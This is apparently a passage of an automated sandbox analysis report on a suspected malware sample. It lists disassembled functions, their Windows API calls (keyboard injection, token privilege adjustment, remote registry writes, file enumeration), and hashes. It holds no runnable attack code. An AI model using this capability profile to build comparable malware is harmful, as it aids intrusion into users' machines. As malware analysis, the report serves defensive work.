                      • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 0048CEF5
                      • ReleaseCapture.USER32 ref: 0048CF00
                      • GetCursorPos.USER32(?), ref: 0048CF3A
                      • ScreenToClient.USER32(?,?), ref: 0048CF47
                      • SendMessageW.USER32(?,00001012,00000000,?), ref: 0048CFA3
                      • SendMessageW.USER32 ref: 0048CFD1
                      • SendMessageW.USER32(?,00001111,00000000,?), ref: 0048D00E
                      • SendMessageW.USER32 ref: 0048D03D
                      • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 0048D05E
                      • SendMessageW.USER32(?,0000110B,00000009,?), ref: 0048D06D
                      • GetCursorPos.USER32(?), ref: 0048D08D
                      • ScreenToClient.USER32(?,?), ref: 0048D09A
                      • GetParent.USER32(?), ref: 0048D0BA
                      • SendMessageW.USER32(?,00001012,00000000,?), ref: 0048D123
                      • SendMessageW.USER32 ref: 0048D154
                      • ClientToScreen.USER32(?,?), ref: 0048D1B2
                      • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 0048D1E2
                      • SendMessageW.USER32(?,00001111,00000000,?), ref: 0048D20C
                      • SendMessageW.USER32 ref: 0048D22F
                      • ClientToScreen.USER32(?,?), ref: 0048D281
                      • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 0048D2B5
                        • Part of subcall function 004025DB: GetWindowLongW.USER32(?,000000EB), ref: 004025EC
                      • GetWindowLongW.USER32(?,000000F0), ref: 0048D351
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease_wcsncpy
                      • String ID: @GUI_DRAGID$F$pbL
                      • API String ID: 3977979337-2097280626
                      • Opcode ID: 7eec303b30a7e05565a51c011a33495ec48739f70336c03353c9e9cc797f9edd
                      • Instruction ID: aa2ec0652ddf211ac3aa7531e5acae26c7b16f0e73498be5a03c601873f34f9f
                      • Opcode Fuzzy Hash: 7eec303b30a7e05565a51c011a33495ec48739f70336c03353c9e9cc797f9edd
                      • Instruction Fuzzy Hash: FE42DE74604640AFC720EF24D888EAEBBE5FF48310F140A2EF559973A1C735E855DB6A
                      Function 00416F9E Relevance: 55.8, APIs: 19, Strings: 10, Instructions: 5018COMMON
                      Download Yara Rule
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: _memmove$_memset
                      • String ID: ]K$3cA$DEFINE$P\K$Q\E$[:<:]]$[:>:]]$\b(?<=\w)$\b(?=\w)$_A
                      • API String ID: 1357608183-1426331590
                      • Opcode ID: b28a790e45669a4902d64bf1598fd7c3bcb7bf2305bb98875f8069baf6f44106
                      • Instruction ID: 24ac3008a4780d7342888deeabfce4e0a58b67e9339f094d14e98286774badb8
                      • Opcode Fuzzy Hash: b28a790e45669a4902d64bf1598fd7c3bcb7bf2305bb98875f8069baf6f44106
                      • Instruction Fuzzy Hash: A193A471A002199BDB24CF58C8817EEB7B1FF48315F24815BED45AB392E7789D86CB48
                      Function 004048D7 Relevance: 43.9, APIs: 24, Strings: 1, Instructions: 131keyboardthreadwindowCOMMON
                      Download Yara Rule
                      APIs
                      • GetForegroundWindow.USER32(00000000,?), ref: 004048DF
                      • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0043D665
                      • IsIconic.USER32(?), ref: 0043D66E
                      • ShowWindow.USER32(?,00000009), ref: 0043D67B
                      • SetForegroundWindow.USER32(?), ref: 0043D685
                      • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0043D69B
                      • GetCurrentThreadId.KERNEL32 ref: 0043D6A2
                      • GetWindowThreadProcessId.USER32(?,00000000), ref: 0043D6AE
                      • AttachThreadInput.USER32(?,00000000,00000001), ref: 0043D6BF
                      • AttachThreadInput.USER32(?,00000000,00000001), ref: 0043D6C7
                      • AttachThreadInput.USER32(00000000,?,00000001), ref: 0043D6CF
                      • SetForegroundWindow.USER32(?), ref: 0043D6D2
                      • MapVirtualKeyW.USER32(00000012,00000000), ref: 0043D6E7
                      • keybd_event.USER32(00000012,00000000), ref: 0043D6F2
                      • MapVirtualKeyW.USER32(00000012,00000000), ref: 0043D6FC
                      • keybd_event.USER32(00000012,00000000), ref: 0043D701
                      • MapVirtualKeyW.USER32(00000012,00000000), ref: 0043D70A
                      • keybd_event.USER32(00000012,00000000), ref: 0043D70F
                      • MapVirtualKeyW.USER32(00000012,00000000), ref: 0043D719
                      • keybd_event.USER32(00000012,00000000), ref: 0043D71E
                      • SetForegroundWindow.USER32(?), ref: 0043D721
                      • AttachThreadInput.USER32(?,?,00000000), ref: 0043D748
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                      • String ID: Shell_TrayWnd
                      • API String ID: 4125248594-2988720461
                      • Opcode ID: c65cf632393a49513bea40c5a00901192d62317a1410f3ef3d84c68e5820f373
                      • Instruction ID: c1ca6a344bcdfaba0e974823023d667c19296b4d148af4653ab9434bf50545cf
                      • Opcode Fuzzy Hash: c65cf632393a49513bea40c5a00901192d62317a1410f3ef3d84c68e5820f373
                      • Instruction Fuzzy Hash: AE319671A40318BBEB206F619C49F7F7F6CEB48B50F10443AFA04EA1D1D6B45D11ABA9
                      Function 00458310 Relevance: 35.2, APIs: 17, Strings: 3, Instructions: 224COMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 004587E1: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0045882B
                        • Part of subcall function 004587E1: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00458858
                        • Part of subcall function 004587E1: GetLastError.KERNEL32 ref: 00458865
                      • _memset.LIBCMT ref: 00458353
                      • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 004583A5
                      • CloseHandle.KERNEL32(?), ref: 004583B6
                      • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 004583CD
                      • GetProcessWindowStation.USER32 ref: 004583E6
                      • SetProcessWindowStation.USER32(00000000), ref: 004583F0
                      • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 0045840A
                        • Part of subcall function 004581CB: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00458309), ref: 004581E0
                        • Part of subcall function 004581CB: CloseHandle.KERNEL32(?,?,00458309), ref: 004581F2
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
                      • String ID: $default$winsta0
                      • API String ID: 2063423040-1027155976
                      • Opcode ID: f1eb64104ed1622580f3cc1903f21bcf7017a613b5796398a8736ced2f997cee
                      • Instruction ID: 3323b63beeccf06d974511bf231c05544c13643482a2b8641c754c26865e528a
                      • Opcode Fuzzy Hash: f1eb64104ed1622580f3cc1903f21bcf7017a613b5796398a8736ced2f997cee
                      • Instruction Fuzzy Hash: F3814871900209BFDF119FA5DC45AEE7B78AF08305F14416EFC10B6262EF399A19DB28
                      Function 0046C75C Relevance: 28.3, APIs: 13, Strings: 3, Instructions: 280timefileCOMMON
                      Download Yara Rule
                      APIs
                      • FindFirstFileW.KERNEL32(?,?), ref: 0046C78D
                      • FindClose.KERNEL32(00000000), ref: 0046C7E1
                      • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0046C806
                      • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0046C81D
                      • FileTimeToSystemTime.KERNEL32(?,?), ref: 0046C844
                      • __swprintf.LIBCMT ref: 0046C890
                      • __swprintf.LIBCMT ref: 0046C8D3
                        • Part of subcall function 00407DE1: _memmove.LIBCMT ref: 00407E22
                      • __swprintf.LIBCMT ref: 0046C927
                        • Part of subcall function 00423698: __woutput_l.LIBCMT ref: 004236F1
                      • __swprintf.LIBCMT ref: 0046C975
                        • Part of subcall function 00423698: __flsbuf.LIBCMT ref: 00423713
                        • Part of subcall function 00423698: __flsbuf.LIBCMT ref: 0042372B
                      • __swprintf.LIBCMT ref: 0046C9C4
                      • __swprintf.LIBCMT ref: 0046CA13
                      • __swprintf.LIBCMT ref: 0046CA62
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: __swprintf$FileTime$FindLocal__flsbuf$CloseFirstSystem__woutput_l_memmove
                      • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
                      • API String ID: 3953360268-2428617273
                      • Opcode ID: 77525ac0cfac28e2ae67cd84ccd41d374f9895f2458c58216a587ca322c69e5f
                      • Instruction ID: 7d9c3182f1c50569ad22dcb29b7867164fdd6ce968260aea251e7ba13e5350ae
                      • Opcode Fuzzy Hash: 77525ac0cfac28e2ae67cd84ccd41d374f9895f2458c58216a587ca322c69e5f
                      • Instruction Fuzzy Hash: AFA13EB1504304ABC710EFA5C885DAFB7ECFF94708F40492EF585D6192EA38DA08CB66
                      Function 0046EF95 Relevance: 28.1, APIs: 15, Strings: 1, Instructions: 119fileCOMMON
                      Download Yara Rule
                      APIs
                      • FindFirstFileW.KERNEL32(?,?,75568FB0,?,00000000), ref: 0046EFB6
                      • _wcscmp.LIBCMT ref: 0046EFCB
                      • _wcscmp.LIBCMT ref: 0046EFE2
                      • GetFileAttributesW.KERNEL32(?), ref: 0046EFF4
                      • SetFileAttributesW.KERNEL32(?,?), ref: 0046F00E
                      • FindNextFileW.KERNEL32(00000000,?), ref: 0046F026
                      • FindClose.KERNEL32(00000000), ref: 0046F031
                      • FindFirstFileW.KERNEL32(*.*,?), ref: 0046F04D
                      • _wcscmp.LIBCMT ref: 0046F074
                      • _wcscmp.LIBCMT ref: 0046F08B
                      • SetCurrentDirectoryW.KERNEL32(?), ref: 0046F09D
                      • SetCurrentDirectoryW.KERNEL32(004B8920), ref: 0046F0BB
                      • FindNextFileW.KERNEL32(00000000,00000010), ref: 0046F0C5
                      • FindClose.KERNEL32(00000000), ref: 0046F0D2
                      • FindClose.KERNEL32(00000000), ref: 0046F0E4
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
                      • String ID: *.*
                      • API String ID: 1803514871-438819550
                      • Opcode ID: 6ca42bdee5e764a2d4c938babfd9147ccfee36eb28773e9f100ec5c7d0d625b2
                      • Instruction ID: e0d4b25dfa95f140917fd6c0b332215adfde449a0ea65fd213ed944f24ec6cf3
                      • Opcode Fuzzy Hash: 6ca42bdee5e764a2d4c938babfd9147ccfee36eb28773e9f100ec5c7d0d625b2
                      • Instruction Fuzzy Hash: EC31E7325011187ADF14EFA4EC48AEF77AC9F44360F10057BE844D2191EB79DA88CB6E
                      Function 00480857 Relevance: 26.7, APIs: 9, Strings: 6, Instructions: 477registryCOMMON
                      Download Yara Rule
                      APIs
                      • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00480953
                      • RegCreateKeyExW.ADVAPI32(?,?,00000000,0048F910,00000000,?,00000000,?,?), ref: 004809C1
                      • RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 00480A09
                      • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 00480A92
                      • RegCloseKey.ADVAPI32(?), ref: 00480DB2
                      • RegCloseKey.ADVAPI32(00000000), ref: 00480DBF
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: Close$ConnectCreateRegistryValue
                      • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                      • API String ID: 536824911-966354055
                      • Opcode ID: 402a0be2be15d02426c802a6b5cbb10d6df440216a26218798080461d8712646
                      • Instruction ID: 75f0257f13d9dd97868b06569ad7b6a65722ecc89240c550ead6eefe92fcdcfb
                      • Opcode Fuzzy Hash: 402a0be2be15d02426c802a6b5cbb10d6df440216a26218798080461d8712646
                      • Instruction Fuzzy Hash: 3E023A756106119FCB54EF15D841E2AB7E5FF89314F04886EF8899B3A2CB38EC45CB89
                      Function 004166E1 Relevance: 25.9, Strings: 20, Instructions: 889COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID:
                      • String ID: 0DJ$0EJ$0FJ$3cA$ANY)$ANYCRLF)$BSR_ANYCRLF)$BSR_UNICODE)$CR)$CRLF)$LF)$LIMIT_MATCH=$LIMIT_RECURSION=$NO_AUTO_POSSESS)$NO_START_OPT)$UCP)$UTF)$UTF16)$pGJ$_A
                      • API String ID: 0-559809668
                      • Opcode ID: 6a8c43c5cd2287656802195d535ea908290b48d8ab3bfd826a36c9d68e310c78
                      • Instruction ID: 6096d484c95c14ad7aa8192e29e4e3e8d71b99b3f093478e4f466f6acf52d5c9
                      • Opcode Fuzzy Hash: 6a8c43c5cd2287656802195d535ea908290b48d8ab3bfd826a36c9d68e310c78
                      • Instruction Fuzzy Hash: 13727E75E002199BDB14CF59C8807EEB7B5FF48311F15816BE809EB291E7389E85CB98
                      Function 0046F0F2 Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 112fileCOMMON
                      Download Yara Rule
                      APIs
                      • FindFirstFileW.KERNEL32(?,?,75568FB0,?,00000000), ref: 0046F113
                      • _wcscmp.LIBCMT ref: 0046F128
                      • _wcscmp.LIBCMT ref: 0046F13F
                        • Part of subcall function 00464385: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 004643A0
                      • FindNextFileW.KERNEL32(00000000,?), ref: 0046F16E
                      • FindClose.KERNEL32(00000000), ref: 0046F179
                      • FindFirstFileW.KERNEL32(*.*,?), ref: 0046F195
                      • _wcscmp.LIBCMT ref: 0046F1BC
                      • _wcscmp.LIBCMT ref: 0046F1D3
                      • SetCurrentDirectoryW.KERNEL32(?), ref: 0046F1E5
                      • SetCurrentDirectoryW.KERNEL32(004B8920), ref: 0046F203
                      • FindNextFileW.KERNEL32(00000000,00000010), ref: 0046F20D
                      • FindClose.KERNEL32(00000000), ref: 0046F21A
                      • FindClose.KERNEL32(00000000), ref: 0046F22C
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
                      • String ID: *.*
                      • API String ID: 1824444939-438819550
                      • Opcode ID: 5e4c1ca136502ca1550e0c7352cbc5842e7fcfe98f56b9ff86b85f6952a77760
                      • Instruction ID: 359f8111c83e04d014ff149dee767818393646aa3285bf91305061d844a33625
                      • Opcode Fuzzy Hash: 5e4c1ca136502ca1550e0c7352cbc5842e7fcfe98f56b9ff86b85f6952a77760
                      • Instruction Fuzzy Hash: 1031C3365001196ADF10AEA4FC54AEE77AC9F45360F2005BBE844A2190EA39DE89CA6D
                      Function 0046A1EF Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 102fileCOMMON
                      Download Yara Rule
                      APIs
                      • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 0046A20F
                      • __swprintf.LIBCMT ref: 0046A231
                      • CreateDirectoryW.KERNEL32(?,00000000), ref: 0046A26E
                      • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 0046A293
                      • _memset.LIBCMT ref: 0046A2B2
                      • _wcsncpy.LIBCMT ref: 0046A2EE
                      • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 0046A323
                      • CloseHandle.KERNEL32(00000000), ref: 0046A32E
                      • RemoveDirectoryW.KERNEL32(?), ref: 0046A337
                      • CloseHandle.KERNEL32(00000000), ref: 0046A341
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
                      • String ID: :$\$\??\%s
                      • API String ID: 2733774712-3457252023
                      • Opcode ID: f5c4c2d66afbbd10ee5f85d9a25c73fd31d49a88663bd8fadf72adc8619a6d0a
                      • Instruction ID: f10b276181cf8096dd79107661fba1eb4aa855f6953dd7c4d63ebe7d830bec3b
                      • Opcode Fuzzy Hash: f5c4c2d66afbbd10ee5f85d9a25c73fd31d49a88663bd8fadf72adc8619a6d0a
                      • Instruction Fuzzy Hash: 1E31C571500119ABDB20DFA0DC49FEF77BCEF88704F1044BAF908E2260E77496948B29
                      Function 0046001C Relevance: 18.2, APIs: 12, Instructions: 186keyboardCOMMON
                      Download Yara Rule
                      APIs
                      • GetKeyboardState.USER32(?), ref: 00460097
                      • SetKeyboardState.USER32(?), ref: 00460102
                      • GetAsyncKeyState.USER32(000000A0), ref: 00460122
                      • GetKeyState.USER32(000000A0), ref: 00460139
                      • GetAsyncKeyState.USER32(000000A1), ref: 00460168
                      • GetKeyState.USER32(000000A1), ref: 00460179
                      • GetAsyncKeyState.USER32(00000011), ref: 004601A5
                      • GetKeyState.USER32(00000011), ref: 004601B3
                      • GetAsyncKeyState.USER32(00000012), ref: 004601DC
                      • GetKeyState.USER32(00000012), ref: 004601EA
                      • GetAsyncKeyState.USER32(0000005B), ref: 00460213
                      • GetKeyState.USER32(0000005B), ref: 00460221
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: State$Async$Keyboard
                      • String ID:
                      • API String ID: 541375521-0
                      • Opcode ID: f2f36dec6c4a46bfceebef3e5bbc60e354e372eebad2095a13b7bb07ab711d72
                      • Instruction ID: c6705f0abb03acfe1c66d12a8beead0d319d3067caf51b1e954f1b2a293a3a50
                      • Opcode Fuzzy Hash: f2f36dec6c4a46bfceebef3e5bbc60e354e372eebad2095a13b7bb07ab711d72
                      • Instruction Fuzzy Hash: 7F51BC2090478829FB35D7A098547EBBFB49F12380F08459F99C2566C3FA5C9A8CC75B
                      Function 004803DA Relevance: 16.9, APIs: 11, Instructions: 397registryCOMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 00480E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0047FDAD,?,?), ref: 00480E31
                      • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 004804AC
                        • Part of subcall function 00409837: __itow.LIBCMT ref: 00409862
                        • Part of subcall function 00409837: __swprintf.LIBCMT ref: 004098AC
                      • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 0048054B
                      • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 004805E3
                      • RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 00480822
                      • RegCloseKey.ADVAPI32(00000000), ref: 0048082F
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
